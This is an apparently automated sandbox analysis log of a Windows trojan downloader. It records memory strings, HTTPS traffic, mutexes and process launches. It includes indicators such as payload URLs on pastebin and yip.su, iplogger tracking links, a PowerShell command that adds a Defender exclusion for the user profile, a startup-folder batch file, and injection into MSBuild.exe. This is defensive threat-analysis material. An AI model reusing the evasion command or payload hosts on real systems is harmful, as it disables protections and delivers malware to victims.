          Source: MSBuild.exe, 00000007.00000002.4623253256.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FF4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030F3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030E3000.00000004.00000800.00020000.00000000.sdmp, OpxuPHiFHgdrtftYca7HLIbc.exe.7.dr, RrubXdXqzbveJvxl1Tifb4PD.exe.7.dr, d6stDH4n7YYIgzL0Ov3IxLa8.exe.7.dr, FMT2OeifGUTNfkZyqLG0jeEO.exe.7.dr, cl3vhpdkLtmoLXWJKBugbJDP.exe.7.dr, eTNltv0LYVQnDdBl6tKVEYLr.exe.7.dr, Zu7wa3hTioo41CyobTIbG45C.exe.7.dr, sOj9v5fBDMPcMK0zpX2B6CYH.exe.7.dr, UzLdRf9lIFGRsFA8wLSHgzsn.exe.7.dr, oqEo8V5wvVLKNc2VytL8EAsq.exe.7.drString found in binary or memory: https://iplogger.org/rules/
          Source: MSBuild.exe, 00000007.00000002.4623253256.0000000003041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
          Source: MSBuild.exe, 00000007.00000002.4623253256.0000000002F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/V6VJsrV3
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe, 00000000.00000002.2168250882.0000019C1E400000.00000004.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4622227958.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/V6VJsrV31https://yip.su/RNWPd.exe7https://iplogger.com/1djqU4
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeString found in binary or memory: https://sectigo.com/CPS0
          Source: MSBuild.exe, 00000007.00000002.4623253256.00000000030B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
          Source: MSBuild.exe, 00000007.00000002.4623253256.0000000003167000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
          Source: MSBuild.exe, 00000007.00000002.4623253256.0000000003041000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yip.su
          Source: MSBuild.exe, 00000007.00000002.4623253256.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030F3000.00000004.00000800.00020000.00000000.sdmp, OpxuPHiFHgdrtftYca7HLIbc.exe.7.dr, RrubXdXqzbveJvxl1Tifb4PD.exe.7.dr, d6stDH4n7YYIgzL0Ov3IxLa8.exe.7.dr, FMT2OeifGUTNfkZyqLG0jeEO.exe.7.dr, cl3vhpdkLtmoLXWJKBugbJDP.exe.7.dr, eTNltv0LYVQnDdBl6tKVEYLr.exe.7.dr, Zu7wa3hTioo41CyobTIbG45C.exe.7.dr, sOj9v5fBDMPcMK0zpX2B6CYH.exe.7.dr, UzLdRf9lIFGRsFA8wLSHgzsn.exe.7.dr, oqEo8V5wvVLKNc2VytL8EAsq.exe.7.drString found in binary or memory: https://yip.su/RNWPd
          Source: MSBuild.exe, 00000007.00000002.4623253256.0000000002F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yip.su/RNWPd.exe
          Source: MSBuild.exe, 00000007.00000002.4623253256.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FF4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030F3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030E3000.00000004.00000800.00020000.00000000.sdmp, OpxuPHiFHgdrtftYca7HLIbc.exe.7.dr, RrubXdXqzbveJvxl1Tifb4PD.exe.7.dr, d6stDH4n7YYIgzL0Ov3IxLa8.exe.7.dr, FMT2OeifGUTNfkZyqLG0jeEO.exe.7.dr, cl3vhpdkLtmoLXWJKBugbJDP.exe.7.dr, eTNltv0LYVQnDdBl6tKVEYLr.exe.7.dr, Zu7wa3hTioo41CyobTIbG45C.exe.7.dr, sOj9v5fBDMPcMK0zpX2B6CYH.exe.7.dr, UzLdRf9lIFGRsFA8wLSHgzsn.exe.7.dr, oqEo8V5wvVLKNc2VytL8EAsq.exe.7.drString found in binary or memory: https://yip.su/redirect-
          Source: MSBuild.exe, 00000007.00000002.4623253256.0000000003041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yip.sudd
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
          Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
          Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
          Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
          Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
          Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49713 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49716 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.76.57:443 -> 192.168.2.6:49732 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49735 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49740 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49796 version: TLS 1.2
          Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeCode function: 0_2_00007FF67DCDED800_2_00007FF67DCDED80
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeCode function: 0_2_00007FF67DCE07D00_2_00007FF67DCE07D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeCode function: 0_2_00007FF67DCC91C00_2_00007FF67DCC91C0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeCode function: 0_2_00007FF67DCDC3D00_2_00007FF67DCDC3D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeCode function: 0_2_00007FF67DCDDEA00_2_00007FF67DCDDEA0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeCode function: 0_2_00007FF67DCDF5D00_2_00007FF67DCDF5D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeCode function: 0_2_00007FF67DCCE5600_2_00007FF67DCCE560
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeCode function: 0_2_00007FF67DCB81300_2_00007FF67DCB8130
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeCode function: 0_2_00007FF67DCE38700_2_00007FF67DCE3870
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeCode function: 0_2_00007FF67DCD00100_2_00007FF67DCD0010
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeCode function: 0_2_00007FF67DCD8FB00_2_00007FF67DCD8FB0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeCode function: 0_2_00007FF67DCD8B300_2_00007FF67DCD8B30
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeCode function: 0_2_00007FF67DCD32800_2_00007FF67DCD3280
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeCode function: 0_2_00007FF67DCE1A700_2_00007FF67DCE1A70
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeCode function: 0_2_00007FF67DCCFA640_2_00007FF67DCCFA64
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeCode function: 0_2_00007FF67DCE41E00_2_00007FF67DCE41E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeCode function: 0_2_00007FF67DCC39900_2_00007FF67DCC3990
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeCode function: 0_2_00007FF67DCD81800_2_00007FF67DCD8180
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeCode function: 0_2_00007FF67DD649800_2_00007FF67DD64980
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeCode function: 0_2_00007FF67DCE29700_2_00007FF67DCE2970
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeCode function: 0_2_00007FF67DCE25000_2_00007FF67DCE2500
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeCode function: 0_2_00007FF67DCC2CD00_2_00007FF67DCC2CD0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeCode function: 0_2_00007FF67DCC6C400_2_00007FF67DCC6C40
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeCode function: 0_2_00007FF67DCE8C400_2_00007FF67DCE8C40
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeCode function: String function: 00007FF67DCB9DD0 appears 51 times
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeStatic PE information: invalid certificate
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeBinary or memory string: OriginalFilename vs SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe, 00000000.00000000.2141990225.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameIsSuffixIsOddInteger.dllJ vs SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe, 00000000.00000002.2167534405.0000019C1C000000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIsSuffixIsOddInteger.dllJ vs SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe, 00000000.00000002.2168250882.0000019C1E400000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIsSuffixIsOddInteger.dllJ vs SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe, 00000000.00000002.2168250882.0000019C1E400000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNew.exe" vs SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeBinary or memory string: OriginalFilenameIsSuffixIsOddInteger.dllJ vs SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe
          Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@87/26@4/4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeCode function: 0_2_00007FF67DCC2B00 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma,0_2_00007FF67DCC2B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\oqEo8V5wvVLKNc2VytL8EAsq.exeJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6104:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3744:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7036:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5096:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3184:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6456:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5088:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3180:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5180:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5660:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4824:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2448:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2748:120:WilError_03
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6292:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3108:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5972:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:972:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7888:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8064:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5228:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5476:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:612:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_owwvgjly.hoh.ps1Jump to behavior
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Q0yFl4HZQFpr4zRkESdCNqpF.bat" "
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 45.39%
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeReversingLabs: Detection: 60%
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
